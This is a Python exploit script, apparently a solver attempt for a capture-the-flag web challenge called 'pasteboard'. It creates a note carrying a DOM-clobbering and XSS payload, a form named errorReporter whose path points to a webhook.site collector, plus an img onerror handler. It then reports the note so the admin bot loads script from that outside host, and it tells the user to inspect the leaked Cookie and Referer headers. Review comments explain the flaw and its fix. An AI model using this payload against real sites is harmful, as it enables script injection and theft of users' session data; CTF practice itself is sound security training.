import requests

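BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# Working notes for this attempt:
# - The <img onerror> handler fires only AFTER the page's handleError has
#   already run, so the value it reads cannot be changed dynamically.
# - One idea left open: use a getter instead.
# - Another: the flag may already be present in the page somehow, so this
#   attempt checks whether anything useful arrives in the HTTP headers
#   (e.g. Referer) of the script request.
#
# NOTE(review): the page's own script is not shown here. Judging by the
# element names, the markup relies on DOM clobbering: a form with
# id="errorReporter" and an input named "path" shadow a same-named lookup
# that the error handler presumably uses to decide which script to load.
# A note body rendered as raw HTML is what makes that possible. The fix on
# the application side is to sanitize note bodies (drop id/name and
# event-handler attributes) and to restrict script-src with a CSP.

# Protocol-relative form of WEBHOOK ("//host/path"), derived from the
# constant so the collector address is defined in exactly one place.
_WEBHOOK_NO_SCHEME = WEBHOOK.split(":", 1)[1]

# Two lines of markup: the clobbering form, then an <img> whose failed load
# sets window.lastRenderError and throws.
payload = (
    '<form id="errorReporter"><input name="path" '
    f'value="{_WEBHOOK_NO_SCHEME}/exfil.js"></form>\n'
    '<img src=x onerror="window.lastRenderError=\'x\';throw Error()">'
)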

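print("[*] Since dynamic modification doesn't work,")
print("[*] let's check if the flag comes through HTTP headers...")
print()

# Bound every request so an unresponsive server cannot hang the script.
REQUEST_TIMEOUT = 15  # seconds

session = requests.Session()
# allow_redirects=False: the new note's path is read from the Location
# header of the 302 response instead of following the redirect.
resp = session.post(
    f"{BASE_URL}/note/new",
    data={"title": "Check Headers", "body": payload},
    allow_redirects=False,
    timeout=REQUEST_TIMEOUT,
)

location = resp.headers.get('Location')
if resp.status_code == 302 and location:
    note_url = f"{BASE_URL}{location}"

    print(f"[+] Created: {note_url}")

    # The note's path (not the absolute URL) is what gets submitted to
    # /report; 202 is treated as "accepted".
    report = session.post(
        f"{BASE_URL}/report",
        data={"url": location},
        timeout=REQUEST_TIMEOUT,
    )
    print(f"[+] Reported: {report.status_code == 202}")
    print()
    # NOTE(review): expect little from these headers. Cookies scoped to the
    # challenge origin are not sent to a different host, and under the
    # default Referrer-Policy of current browsers
    # (strict-origin-when-cross-origin) a cross-origin request carries only
    # the origin in Referer, not the note path or query string.
    print("[*] Check webhook for /exfil.js request")
    print("[*] Look at ALL headers, especially:")
    print("    - Cookie header")
    print("    - Referer header")
    print("    - User-Agent")
    print()
    print("    https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")
else:
    # Previously a non-302 reply (or a 302 without Location) ended the
    # script silently; say what came back so the run is diagnosable.
    print(
        f"[-] Note was not created "
        f"(status {resp.status_code}, Location={location!r})"
    )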
